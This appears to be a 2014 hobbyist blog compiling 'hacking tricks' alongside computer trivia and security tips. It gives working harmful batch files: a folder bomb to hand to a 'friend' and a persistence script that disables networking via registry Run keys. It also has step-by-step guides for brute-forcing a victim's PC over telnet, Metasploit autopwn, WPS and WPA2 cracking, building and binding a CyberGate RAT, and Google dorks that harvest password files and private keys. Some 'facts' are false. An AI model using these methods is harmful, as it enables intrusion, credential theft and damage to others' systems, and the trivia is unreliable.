Monday, 7 July 2014
DOWNLOAD AN ENTIRE WEBSITE
This is the hardcore option:
downloading the entirety of a single
website for offline reading.
Obviously how long this takes will
vary depending on the web site in
questions – Wikipedia could take
days to finish, and will take up a lot
of your hard drive when it does. If
you just want an offline copy of
something simple, however, like the
database
a simple site outlining a few recipes
you were thinking of trying,
downloading an entire website might
be right for you.
The software I recommend for
downloading an entire site is
HTTrack,
This open source program can be a
little hard to use at first – especially
if you’re not a Windows user. But if
you’re looking to make a complete
offline version of your favorite
website – not an individual web page,
an entire web site – it’s one of the
simplest options out there. Tweak
the settings if you run into problems
and you should be fine. Only the
Windows version comes with a
dedicated GUI – Linux users will
need to use a browser-based
version of HTTrack instead. Don’t
worry: items will be added to the
menu so it’s easy enough to get
started.
Mac users can install the software
using MacPorts, but many might be
better off checking out Sitesucker,
a free Mac app that functions
similarly but is easy to install and has
it’s own GUI.
Some Facts About Computers And IT
1.A byte means 8 bits and a nibble means 4 bits.
2.First harddisk available was of 5MB 3.Ethernet is the registered trademark of Xerox.
4.google uses over 10000 network computers to crawl the web
5.google can be queried in 26 languages
6.The floopy disk was patented by allen shugart in 1946.
7.More than 80% of web pages are in english. 8.88% percent web pages have very low traffic rate.
9.An average american is dependent on 250 computers.
10.Internet is most fastest growing platform for advertisement.
11.About one third of CDs are pirated
12.About 76% softwares used in india are pirated.
13.Only 10% of the webpages are used by the search engines
14."I feeling Lucky"This button is used by negligibal no of people on net"
HOW TO TRACE AN EMAIL
So here is the method of tracing the
exact location from the email sent. I
am showing the email tracing on yahoo
here but gmail and other mail
providing services have same concept.
Step 1:-First open up your email
account and click on your inbox.
Step 2:-Now Select any email that you
want to trace
Step 3:-After Opening scroll the mail
at the end and in right corner you will
see a option FULL HEADER click on it
Step 4:- Now Closely Look at the the
header you will find the whole detail
that from which IP address it is sent.
HACK REMOTE COMPUTERS USING THEIR IP ADRESS
1.Confirm a computer
you want to hack
2. Find or regain their IP address.
3. Make sure the IP address is online
4. scan open ports
5. Check venerable ports
6. access via port
7. brute force username and password
Find the
IP address of victams computer...
Is it online
? For the online status just ping the
IP, if it is online address, he will
answer
. If the IP address is online, scan for
open ports. Open ports are like
closed door without locks, you can go
inside and outside easily
. Use Advanced Port Scanner to scan
all open and venerable ports
.
Now that you have the IP address
and port address Open the victim,
you can now use telnet to try to
access it. Make sure you have telnet
enabled in your computer or install it
from the Control Panel> Add or
Remove Programs> Add Windows
components . Now open a command
prompt and use the telnet command
to access the IP address. Use the
following syntax for the connection
. telnet [IP address] [port]
You will be prompted to
information input connection
.
If you can guess
theinformation'seasily then it is
OK. Or you can use some tools
brute force like this.
HOW TO HIDE SECRET FILE IN IMAGE?
open command prompt.
Now change directory to picture
folder through command prompt.
Now compress your secret file
(secret.pdf) using winrar.
Next we use command prompt. type
following code
copy /b [image_filename].jpg + [rar_
filename].rar nkd.jpg
for our example code becomes
copy /b apple.jpg + secret.rar
nkd.jpg
here nkd.jpg is our newfile which
contain hidden document.
Go your picture folder , you can see
nkd.jpg.
Now to view original file ,nothing too
do just open file with winrar or you
can also change extention from jpg to
rar.
here nkd.jpg is our newfile which
contain hidden document.
Go your picture folder , you can see
nkd.jpg.
Now to view original file ,nothing too
do just open file with winrar or you
can also change extention from jpg to
rar.
NETWORK SNIFFER OR NETWORK MONITOR
A network sniffers
monitors data flowing over computer
network links. It can be a self-
contained software program or a
hardware device with the
appropriate software or firmware
programming. Also sometimes called
"network probes" or "snoops,"
sniffers examine network traffic,
making a copy of the data but
without redirecting or altering it.
Some sniffers work only with TCP/
IP packets, but the more
sophisticated tools can work with
many other protocols and at lower
levels including Ethernet frames.
Years ago, sniffers were tools used
exclusively by professional network
engineers. Nowadays, however, they
are also popular with Internet
hackers and people just curious
about networking. Several sniffer
software applications are available
on the Web for download.
#note.....guys I really work hard on these posts to keep u people updated...so keep liking and commenting,that will encourage me write more useful stuff..
Rootkits
Rootkit is a malicious software that
is used to gain the administrator
access to the operating system of
the target computer.
Traditionally, on the Unix systems,
the main administrator account has a
username called 'root'. This root
user has all the privileges on the
operating system. This is how
rootkits got their name, since their
basic task is to obtain root-level
access to the system.
The first known rootkit was written
by Lane Davis and Riley Dake for
SunOS 4.1.1 in 1990.
Often rootkits hide their installation
by replacing the standard operating
system executables and libraries
(dlls). Because of this, even if
somebody scans the process table
of the operating system he/she
cannot detect the presence of a
rootkit since all that he/she sees are
the regular operating system
processes.
FOLDER BOMBER
This batch file will create 3000+
folder
in less than a minute.
Open your notepad and type the
following
codes.
@echo off
:top
md %random%
goto top
Save it as 3000.bat
Give this file to your 'friend' and
when he
will click on that his nightmare will
be
started.
TRICK TO MAKE VIRUS WHICH CAN DISABLE INTERNET TEMPORARLY
To do this follow the steps..
1) Open Notepad.
2) Copy and Paste the following
Code into Notepad :
echo @
echo off>c:windowswimn32.bat
echo break
off>>c:windowswimn32.bat
echo ipconfig/release_
all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add
hkey_local_
machinesoftwaremicrosoftwindowsc
urrentv ersionrun /v
WINDOWsAPI /t reg_sz /d
:windowswimn32.bat /f reg add
hkey_current_
usersoftwaremicrosoftwindowscurr
entve rsionrun /v CONTROLexit /t
reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
3) Save it as Internet Disabled.bat.
4) Now it is done. So it is a simple
Trick to make Virus which can
Disable Internet temporarily.
Hacking FB Account Using Google Dork Lis
Method 1:
usernames and passwords of many
accounts including Facebook!
The Dork: intext:charset_test=
email= default_
persistent=
Enter that into Google, and you will
be presented
with several sites
that have username and passwords
lists!
Method 2: WordPress!
This will look for WordPress backup
files Which do contain the
passwords, and all data for the site!
The Dork:
filetype:sql inurl:wpcontent/
backup-*
Method 3: WWWBoard!
This will look for the user and
passwords of WWWBoard
usersThe
Dork: inurl:/wwwboard/passwd.txt
Method 4: FrontPage!
This will find all users and
passwords, similar to above.
The Dork: ext:pwd inurl service |
authors | administrators | users)
"# - FrontPage-"
Method 5: Symfony!This finds
database information and loginsThe
Dork: inurl:config/databases.yml -
trac -trunk -"Google Code" -source
-repository
Method 6: TeamSpeak! (big one!!!!!)
This will search for the server.dbs
file (a Sqlite database file With the
SuperAdmin username and
password!!!)
The Dork: server-dbs "intitle:index
of"
Method 7: TeamSpeak2!!! (also big!)
This will find the log file which has
the Super Admin user and pass in
the Top 100 lines. Look for
"superadmin account info:"
The Dork: "inurl:Teamspeak2_RC2/
server.log"
Method 8: Get Admin pass!Simple
dork which looks for all types of
admin info
The Dork: "admin account info"
filetype:log
Method 9: Private keys! (not any
more!) This will find any .pem files
which contain private keys.
The Dork: filetype:pem pem
intext:private
And the Ultimate one, the regular
directory full of passwords....
Method 10: The Dir of Passwords!
Simple one!
The Dork: intitle:"Index of..etc"
passwd
What is XSS?
Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.
In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.
Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
HOW TO SAFE YOUR FACEBOOK ACCOUNT FROM HACKERS,PHISHING ATTACK OR KEYLOGGING/VIRUS
1- All users must be have their strong password [maximum 12 words & 5 numbers]
2- Go to setting option click 'security' click on secure browsing you must be 'enable browsing'.
3- Click on login notification you see two option 'text' 'email or push notification' & click on both option.
4- You must be enable 'code generator' in security option.
5- If you use 'trusted contacts' don't add online people to trusted contacts if you use so please please add those online people who have very close you, you meet with them, you everything know about him/her.
6- Go to 'privacy' setting you see 'Who can see my stuff?' set the 'friends'.
7- Next you see Who can contact me? Who can send you friend requests? set the everyone or friends of friends your choice. Whose messages do I want filtered into my Inbox? Filter your Inbox using: Set your own choice>>>
Basic Filtering Recommended Mostly friends and people you may know
Strict Filtering Mostly see messages from friends. Messages from people you want to hear from may go to your Other folder.
8- Who can look me up? Who can look you up using the email address or phone number you provided? Set the 'friends' if you wanna more secure set the 'only me'.
9- Go to Timeline & tagging setting Who can add things to my timeline? Set the 'only me' Review posts friends tag you in before they appear on your timeline?
Set the 'off'.
Who can see things on my timeline? Who can see things on my timeline Set the 'friend' Who can see what others post on your timeline? Set the 'only me'.
How can I manage tags people add and tagging suggestions? Set the 'on'/'friends'/'friends'. they are 3 option in How can I manage tags people add and tagging suggestions?.
10- Notification setting 'How You Get Notifications' On facebook set the 'all notification&sound' Email notification set the 'all notification'
11- What You Get Notified About Activity that involves youView set the 'On'
Close Friends activity set the 'Facebook & email'
Tags set the 'Friends'
Followers On for Friends of Friends
12- Next the mobile option you must be register mobile number for recover or reset password.
13- Add alternative id to reset password [12 & 13 option are required]
14- Turn On Follow
turn on follow Followers will only see your public posts and will not be added as friends. You can choose the posts you want to make public and those you only want to share with friends. Follower Comments Who can comment on your public posts? Set the 'Friends'
Follower Notifications
Get notifications from set the 'Friends of Friends'
15- If you add personal detail in timeline setting go to timeline click about & set the all setting to friends or only me. About You, Work and Education, Relationships and Family, living, basic information set the 'friends'. Mobile Phones
Address, Screen, Email. Facebook they are contact info set the all 'only me'.
16- Others info you see in about (in timeline) set all privacy to 'friends'
17- You must be add twitter id to fb account which your tweets or which you following the people tweets to your news feeds.
18- If you add anu like as youtube se the privacy all app to friends only friends see your app then when you add video to your playlists, like video, favorites video in youtube they also update post in your newsfeed.
19- Do not accept friend request for those people who have not upload real profile photo, their lived in option are not see, in their timeline, do not accept friend request quickly i suggest you accept request after 2 days. When you will send friend request or accept request you must see their timeline their latest update if not do not accept & send friend request.
20- Do not join anonymous groups and do not like, like the page those is not activate&update. How can you check if page is active&update so like the page then if you will see in like button 'Show in news feed & setting' option then you will like the page if only 'Show in news feeds do not like page & do not like the post.
21- If someone contact you who is outside country (INDIA) quickly block them.
22- Do not upload any files like as software from your pc only upload photos&videos from pc fb don't upload the program file and do not post anonymous link in your fb if you, please scan the URL link
go to WWW.VIRUSTOTAL.COM & scan url if show virus do not post link.
NOTIFICATION & CODE GENERATOR MEANS THAT IF SOMEONE HACK OR ATTACK PHISHING ON YOUR FB, FACEBOOK NOTIFY IN YOUR EMAIL & ON FACEBOOK THEY WILL AUTOMATIC LOGOUT OR REDIRECT TO RESET PASSWORD PAGE.
Cracking WPA/WPA2 By brute forcing Wi-fi Protected Setup
For legal purposes, please don’t try
this on any equipment that you don’t
own.
Intro
Wi-fi Protected Setup more
commonly known as WPS is an
optional configuration tool
introduced in many Small office and
Home Office (SOHO) Wireless
routers starting in early 2007. This
Wi-Fi alliance certification program
was designed to ease the task of
SOHO wireless configuration by
providing an industry wide network
setup solution. Now a day most
major vendors of the SOHO class of
Wi-Fi routers ship there product
with WPS support and is activated
by default.
Today we will be taking a look at 2
flaws in the WPS design that can be
exploited in order to brute force
the WPS PIN. I will do a brief
overview of these 2 flaws then
follow up by providing instruction on
how to work through exploiting WPS
on a SOHO router using Backtrack 5
R3 and a tool called Reaver.
The Flaws
The flaws we will be looking at have
to do with WPS’s support for in-band
configuration over IEEE 802.11/EAP
specifically with the External
registrar process. This is the
process used by a WLAN host to
associate with a WAP by using the
devices WPS PIN. That being said
the first flaw with this external
registrar option is that it does not
require any authentication from the
WLAN host to associate with the
WAP leaving the PIN vulnerable to
Brute force type attacks.
The second Flaw has to do with the
way the WPS authentication process
is implemented with 802.11/EAP.
This process uses a challenge
response methodology and if at any
point in the process you fail to
correctly respond to the challenge
you receive a EAP-NACK Message.
This process also splits the key into
2 parts as shown below
|1|2|3|4|5|6|7|0|
1st half| 2nd half &
of PIN | Checksum
So by knowing what at what step we
are in the process when we receive
the EAP-NACK we reduce the
number of possibilities from 10^8
down to 10^4 +10^4 or 100,000,000
to 20,000 but since we know the 8th
digit is a checksum of the pin we are
really looking at 10^4 + 10^3 or
11,000 total testable combinations to
solve for the completed WPS PIN.
So with a tool like reaver testing 4
Pin’s every 3 seconds we can get
through all possible combinations in
approximately 4 hours.
Using Reaver with Backtrack 5 R3
What you will need: A copy of
Backtrack 5, and an external WLAN
adapter ( I use the Alfa networks
AWUS036H ) You will also need to
know the BSSID (MAC Address ) of
the Router you plan to attack. for
this you can use something like
airodump-ng to analyze all the AP’s in
the area.
So lets get to the fun stuff.
1. Load up your Backtrack 5 instance
2. Open up terminal and run the
following commands
a. CODE :
Sudo apt-get update
b. CODE :
Sudo apt-get install reaver
3. Make sure your Wi-fi adapter is
connected and then place it into
monitor mode
a. CODE :
Airmon-ng start wlan0
4. Next run the following command
to invoke reaver
a. CODE :
Reaver –I mon0 –b <BSSID of
target> -VV
Note: you can use CTRL+C to pause
and save the attack progress to
continue at a later time
DEAD LOCK IN OPERATING SYSTEM
It is a state where two ore more
operations are waiting for
each other, say a computing
action 'A' is waiting for action
'B' to complete, while action
'B' can only execute when 'A'
is completed. Such a situation
would be called a deadlock. In
operating systems, a deadlock
situation is arrived when
computer resources required
for complete of a computing
task are held by another task
that is waiting to execute. The
system thus goes into an
indefinite loop resulting into a
deadlock.
The deadlock in operating
system seems to be a common
issue in multiprocessor
systems, parallel and
distributed computing setups.
Hack Codes for Android Mobile
1. Complete Information About your Phone
*#*#4636#*#*
2. Factory data reset
*#*#7780#*#*
3. Format Android Phone
*2767*3855# (think twice before using this code)
4. Phone Camera Update
*#*#34971539#*#* (Don't Update camera firmware in image)
5. End Call/Power
*#*#7594#*#*
6. File Copy for Creating Backup
*#*#273283*255*663282*#*#*
7. Service Mode
*#*#197328640#*#*
8. WLAN, GPS and Bluetooth Test Codes:
*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (Use "Menu" button to start various tests)
*#*#232338#*#* - Shows WiFi MAC address
*#*#1472365#*#* - GPS test
*#*#1575#*#* - Another GPS test
*#*#232331#*#* - Bluetooth test
*#*#232337#*# - Shows Bluetooth device address
9. Codes to get Firmware version information:
*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate
*#*#1234#*#* - PDA and Phone
*#*#1111#*#* - FTA SW Version
*#*#2222#*#* - FTA HW Version
*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number
10. Codes to launch various Factory Tests:
*#*#0283#*#* - Packet Loopback
*#*#0*#*#* - LCD test
*#*#0673#*#* OR *#*#0289#*#* - Melody test
*#*#0842#*#* - Device test (Vibration test and BackLight test)
*#*#2663#*#* - Touch screen version
*#*#2664#*#* - Touch screen test
*#*#0588#*#* - Proximity sensor test
*#*#3264#*#* - RAM version"
Social Engineering
This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn't deal with the network security issues, vulnerabilities, exploits, etc. It just deals with simple psychological tricks that help to get the information we want. This really works!! But it requires a lot of patience.
We are all talking about network security and fixing the vulnerabilities in networks. But what happens if some internal person of a network accidentally gives out the passwords. After all we are all humans; we are also vulnerable and can be easily exploited and compromised than the computers.
Social Engineering attacks have become most common during the chat sessions. With the increase in use of Instant Messengers, any anonymous person may have a chat with another any where in the world. The most crucial part of this attack is to win the trust of the victim.
It may take a long time (may be in minutes, hours, days or months) for this to happen. But after you are being trusted by the victim he will say you every thing about him. Most of the times his person information will be useful to crack his web accounts like e-mail ids, etc. Even some people are so vulnerable to this attack that they even give their credit card numbers to the strangers (social engineers).
Some social engineers stepped one more forward and they send some keyloggers or Trojans to the victims claimed to be as screensavers or pics. These keyloggers when executed gets installed and send back information to the attacker. So be careful with such attacks.
Prevention:
1) Don’t believe everyone you meet on the net and tell them every thing about you. Don’t even accidentally say answers to the questions like “What’s you pet’s name?”, “What is your mothermaiden’s name?”, etc. which are particularly used by your web account providers to remind your passwords.
2) Don’t give your credit card details to even your chating through instant messengers. Remember, it’s not a hard deal for an attacker to crack an e-mail id and chat with you like your friend. Also data through IMs can be easily sniffed.
3) Don’t accept executable files (like *.exe, *.bat, *.vbs, *.scr, etc.) from unknown persons you meet on the net. They might be viruses or Trojans.
Please act carefully, use security software and ask professionals for help.
Social Engineering Toolkits Like Set , MALTEGO
If interested Go through Url :- ftp://91.193.236.10/pub/docs/linux-support/security/The%20Art%20of%20Human%20Hacking.pdf"
Why Hackers and Programmers choose Linux instead of Windows and Mac?
-Linux is advanced High Level OS.
-Comfortable for Hackers and
others.
-24/7 always virus free.
-Greatest OS for Programmers to
develop Soft.
-Always free.
-All OS born from Linux only.
-Linux contain all types of
Programming Lan and Hacking tools.
-Linux is the No. 1 for Server and
Client Scripting.
-Windows is Base and Linux is Race.
-Linux have high developed
Programmed.
-Linux is the open source OS.
-Google Web Server (GWS) —
Custom Linux-based Web server that
Google uses for its online services.
-Novell in 2006 migrate from
Windows to Linux.
-IBM Supports Linux 100%.
-Amazon.com is said to "use Linux in
nearly every corner of its business.
-Cisco Systems, the computer
networking and routing giant,
switched to Linux.
Some Useful Websites For Hacking.
To check if a port is open:
http://www.canyouseeme.org/
To multiple scan a file for viruses:
http://vscan.novirusthanks.org/
To check if a site is down:
http://www.downforeveryoneorjustme.com/
A place to get newest exploits:
http://www.exploit-db.com/
Lets other people view your inserted text:
http://pastebin.com/
The free online crypting + decrypting service:
http://www.crypo.com/
An online MD5 decrypter:
http://www.md5decrypter.com/
The best online Admin Page Finder:
http://sc0rpion.ir/af/
Online WPA cracker:
http://wpa.darkircop.org/
Online Fake Mailer:
http://emkei.cz/
A mailing site ( it gives you a temporary email account to send and receive messages ):
http://10minutemail.com/10MinuteMail/index.html
It gives you alternatives for program's:
http://alternativeto.net/
Upload and send files to friends etc. Very quick:
http://ge.tt/
The best online Admin Page Finder:
http://sc0rpion.ir/af/
Online WPA cracker:
http://wpa.darkircop.org/
Online Fake Mailer:
http://emkei.cz/
http://10minutemail.com/10MinuteMail/index.html"
"The Hand of thief" the first successful Linux trojan
Desktop Linux must be growing more popular. Someone's finally created what appears to be a semi-successful Linux Trojan.
For years, Linux desktop users had it easy. Their Windows brothers and sisters had to deal with an unending stream of malware; but other than a handful of exploits aimed mostly at Linux servers, there were no real Linux Trojans or viruses. Oh well, all good things must come to an end.
RSA, the Security Division of EMC, has reported that a "Russia-based cybercrime team has set its sights on offering a new banking Trojan targeting the Linux operating system: Hand of Thief."
Here the name of the game is to grab your personal login and password data with a "Form grabber" as you enter it into your bank or other online system. This information consists of your stolen credentials, the timestamp of when you visited a site, which Web sites you visited, and possibly your Web browser's cookies. Finally, all this is then passed on over the Internet to a command-and control server. From there the crooks can get to work selling your information to people who will start running up your credit-card bills.
Hand of Thief also includes a mechanism to prevent users from accessing anti-virus sites. This seems to work by manipulating Internet Domain Name System (DNS) addresses within memory rather than doing some obvious such as changing records in your hosts file.
Its developer claims "it has been tested on 15 different Linux desktop distributions, including Ubuntu, Fedora, and Debian. As for desktop environments, the malware supports 8 different environments, including Gnome and KDE." The attack specifically targets common Web browsers Firefox, Google Chrome, as well as several other that others that are often found on Linux such as Chromium, Aurora, and Ice Weasel.
Spread your RAT Swiftly Video Tutorial: http://www.youtube.com/watch?v=QcHVsUJsAuk
What is RAT?
RAT stands for Remote Access Tool. It allows to access a system remotely without having physical access to the system. It is basically a service that is available in Windows OS known as remote services. It is used to connect to the network system remotely. Simple Remote Desktop Connection and RADIUS servers are the two common methods of doing this.
So we will exploit this service to get unauthorized access. There are many famous tools that allows us to do the following like blackshades, crybergate, cerberus, turkojan etc.
So here we will be discussing about cybergate.
So how will cybergate work?
In cybergate you can create servers (infected exes). If you victim opens this file you will be able to RAT him.
Will the server(infected file) that I create will be picked up by Anti-Virues?
Yes, it will be. You will need to crypt is using a crypter or use other methods like Hexing.
Oki so lets get to the practical part:
I. Create No-IP Account:
1) Goto No-IP.com and register and account.
2) Login to your account.
3) Click on this
4) Keep the same setting as in the picture. And click on create host.
5) Now goto this page and download the no-ip client.
6) Open the downloaded client and install it.
7) Open the installed No-IP Duc client.
Now give in your login details and you will see the created host.
9) Remove the checkbox and again check it.
10) Minimize your no-ip duc
Remember you always need to open your no-ip client and click the check box to get smiley whenever you are going to control your RATs.
II. Port Forwarding:
What is Port Forwarding?
Port forwarding or port mapping is the forwarding of a TCP/IP packet in a network address translator gateway to a predetermined network (which will be our No-IP Account).
1) Find out your gateway.
2) Goto Start----> Run
3) Type in "cmd"
4) Now type "ipconfig" and click enter
5) And you will get the gateway IP.
6) Now type the gateway IP in your web browser.
7) It will ask for username and password.
You can find your username and password from a sticker behind your router. Most of the time the user and pass will be "admin".
9) After successful login to your router you will be able to see options for portfowarding.
10) Forward port "100" to your local IP.
To check whether port "100" is open. Goto this link:
http://www.canyouseeme.org/
...and type in port 100 and check the result.
III. Creating a server:
1) Close your anti-virus. Since this type of virus/trojan builders are detected by anti-viruses as a false positive.
2) Download: http://darkcomet-rat.com/
3) Unrar/Decompress it and open "CyberGate v1.07.5.exe"
4) Wait for 20 seconds untill the disclaimer notice is scrolled over.
5) Click on Control Center and click "Start".
6) A box will pop up. Give the settings: type in the same details (from the top):
100
1,000
123456
then save it.
7) If any Windows Firewall box pops up click "Allow access".
Goto Control Center -----> Builder ----> Create Server.
9) A new box pops up. Click "Add User". Type in a username.
10) Double click the created username.
11) Select DNS port and delete it.
12) Give username: Cyber
and password: 123456
click add
type-in the NO-iP you created and add ":100" at the end.
click OK - this will add it to the DNS list.
13) Follow the picture
14) Select: Bind File,
Bind "..." to setup some file.
Click add after browsing the file you want the virus to be binded.
So you created a server binded to some file!
Top 15 Security/Hacking Tools & Utilities
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing.
2. Nessus Remote Security Scanner
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
3. John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.
#3 How to block Content on the Internet
HTTP(Hyper Text Transfer Protocol):-It is the communication protocol that is normally used by your browser to communicate with websites.
Port:-A port is a door through which data enters or leaves your computer.Ports are used to exchange data between different devices.There are two types of ports:
-Hardware ports:-All of us use hardware ports like USB ports,parallel ports,Ethernet port.These are normally used to exchange data between two devices.
-Virtual ports:-All web applications on your computer open something known as virtual ports on your computer to communicate with servers on the internet.Without virtual ports there would be no way for applications on your computer to communicate with remote servers on the internet.You can find a list of open virtual ports on your computer by simply going to the MSDOS prompt and typing the command netstat-n.
Proxy server:-A proxy server is a server or software that acts as an intermediary between a user and the internet.Whenever a user sends a request for a webpage to a proxy server,the proxy server will forward that request to the relevant server on the internet and then send back the response to the user.
step 1---USER-->sends request for a webpage-->PROXY
step 2---PROXY-->sends same request to relevant website-->WEBSITE
step 3---WEBSITE-->sends back requested page-->PROXY
step 4---PROXY-->sends back request page-->USER.
#2 How to block Content on the Internet:-
Domain name:-It is a quite difficult to remember IP addresses since they are just a bunch of numbers.To make simpler for users,every website not only has an IP address,but also has a corresponding domain name.A domain name is an easy-to-remember name for a website.For example, www.facebook.com is an example of a domain name.
Domain name system(DNS) lookups:-The process of converting a domain name into respective IP address is known as DNS lookup.Your browser performs a DNS lookup automatically in the background each time you type a website address in your browser.
DNS server:-A DNS server is a server that handles DNS lookup queries from browsers/users and sends back replies to them.Your college,company or organization will have its own DNS server that will manage the local user's DNS lookup requests.
How to block Content on the Internet
There is a variety of techniques,methods and tools that organizations,companies and colleges use to block content on the internet.
We'll discuss them but there are some basic technical Internet-related terms that we must know.
IP address:-Every computer connected to the internet has a unique IP address given to it.An IP address is basically a computer's identity on the internet at which it can be contacted.Your computer has an IP address.Your friend's computer has an IP address and even all your favourite websites on the internet have their own IP addresses.A typical IP address looks like the following:203.14.11.12.You can find out your own computer's current IP address by simply your browesr and connecting to the website http://www.whatismyipaddress.com
Hack any PC using IP via Metasploit
1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.
2.) You need PostgrSQL for your database.
Download here:http://www.postgresql.org/
Make sure you use all the defaults or Metasploit woun't work!
3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...
4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.
5.)Now, in the window type:
db_connect postgres:ThePassYouChose@localhost:5432
The first time you do this you will see lots of text flash buy. Don't wory, this is normal.
6.)Type db_host to make sure you are connected correctally.
7.)Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
watch the auto-exploitation start, go play Halo for a while, and then come back...
9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.
10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:
sessions -i ExploitNumber
The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.
Wi-Fi Security Tips & Tricks
Learn how you can secure your Wi-Fi Network. Prevent intruders from easily compromising your Wi-Fi network.
There can be many ways to prevent attacks. One way is to make sure you have encryption enabled and use a strong WPA2 with a
sophisticated password with both small letters, capital letters and characters. Make sure you disable WPS Wifi Protected Setup features
since the feature has been prone to multiple vulnerabilities. Another good way is to lower your signal strength so it is only covering your premises.
This can prevent an intruder sitting outside in a car lot to get a good signal.
Wi-Fi Security Guidelines.
Wi-fi networks are getting more and more widespread. Nowadays, it is possible to find wi-fi networks anywhere. It is therefore of utmost importance for users to focus their attention on the growing threat of hackers and crackers; these online outlaws must be taken very seriously.
Setting up encryption.
Often, when you get a new router or device with wi-fi, it has no password setup at all! It is recommended to always setup an encryption scheme in order to avoid getting hacked by any cyber terrorists..
Ten recommendations concerning safe use of wireless networks.
1. Always use encryption.
2. Set your SSID name to a sophisticated long name with numbers and letters or a non-dictionary term.
3. Do not broadcast your SSID (network name). Keep it hidden.
4. Use MAC filtering to access control connecting IPs.
5. Never use WEP encryption. Even WPA (TKIP) has been found to be vulnerable to attacks.
6. Always use WPA2 (AES) encryption or better encryption.
7. Set the auto change of the key to 1800 seconds (30 minutes).
8. Make sure the password is a non-dictionary term using a combination of at least ten letters and numbers.
9. Implement firewall protection from the wireless access point and to the network.
10. Make sure the web interface on the wireless access point is firewalled and not accessible to intruders.
The Portable Penetrator: Wi-Fi Security Auditing.
With the Portable Penetrator, you can audit or crack WEP, WPA, and WPA2 wi-fi standards! It is recommended for you to use the Portable Penetrator to audit your wi-fi networks as often as possible in order to make sure that no hackers or crackers can compromise or invade your system.
HOW TO SET ADMINISTRATOR PASSWORD IN WINDOWS WITHOUT KNOWING EXISTING PASSWORD.
1. GO TO CONTROL PANEL
2. CLICK ON " ANDMINISTRATIVE TOOLS"
3. NOW CLICK ON " COMPUTER MANAGEMENT "
4. NOW GO TO SYSTEM TOOLS
5. DOUBLE CLICK ON LACAL USERS AND GROUPS
6. THEN FINALLY UNDER USERS U WILL SEE ALL THE USER ACCOUNTS INCLUDING ADMIN ACCOUNT.
7. NOW RIGHT CLICK ON ADMINISTRATOR AND CLICK SET PASSWORD
8. IT WILL NOT ASK FOR PREVIOUS PASSWORD SO U DON'T NEED TO KNOW IT.
9. NOW ALL DONE..! !!
#Working way to hack a wifi .
Strictly warning - FOR STUDY PURPOSE ONLY . If anyone do missuse of the given information then I will not be responsible for it. #Spidr
how to a crack a Wp2-psk password with
windows machine.-
Software used 4 it :-
1. CommView for Wifi
2. Elcomsoft Wireless Security
Auditor
First
you need to be capture the
Wpa2, four-way handsake with
CommView.
Open commView and click on the
Start option
then click on the capture option to
start the capture
now it will show you all available
AP, N
ow click on the Tools > Select
the Node Reassoication option
now select your target AP in the
Send a deauthentication request
from this AP option. it will show
you all available client option.
now click on the Send Now option
to send the packet for 4-way
authentication.
wait for some time
so it will capture the packet.
now click on the Save option and
choose your file format Commview
Capture Files (*.ncf)
you capture work is done.
Now open Elcomsoft Wireless
Security Auditor
Click on the Import Data tab > select
the Import CommViewLog option .
now it will show you information
about AP and Multiple Handshake
selection information. Click on Ok.
now click on the Start attack option
and select the Dictionary Attack option.
However you have other
attack options are also available.
now within minutes it will found
your password and it will show you
the password.
Convert text files to audio
A post on how to convert text to audio had been posted on this page. So here is a trick to make the computer read out the entire contents of a text file.
1. Open notepad and paste the code given below:
Set sapi = CreateObject("sapi.spvoice")
Set fs = CreateObject("Scripting.FileSystemObject")
path = Inputbox("Enter path for the text file to read:", "#Expert Hackers")
If Not (fs.FileExists(path)) Then
X = Msgbox("The specified file does not exist!", 48, "ERROR!")
Else
Set a = fs.OpenTextFile(path)
text = a.ReadAll
sapi.Speak(text)
a.Close
End If
2. After pasting save as a .vbs file.
3. Open the vbs file and enter the path to the text file and press Enter.
4. If the specified file does not exist an error message will be displayed. If the file exists then the computer will start reading it out!
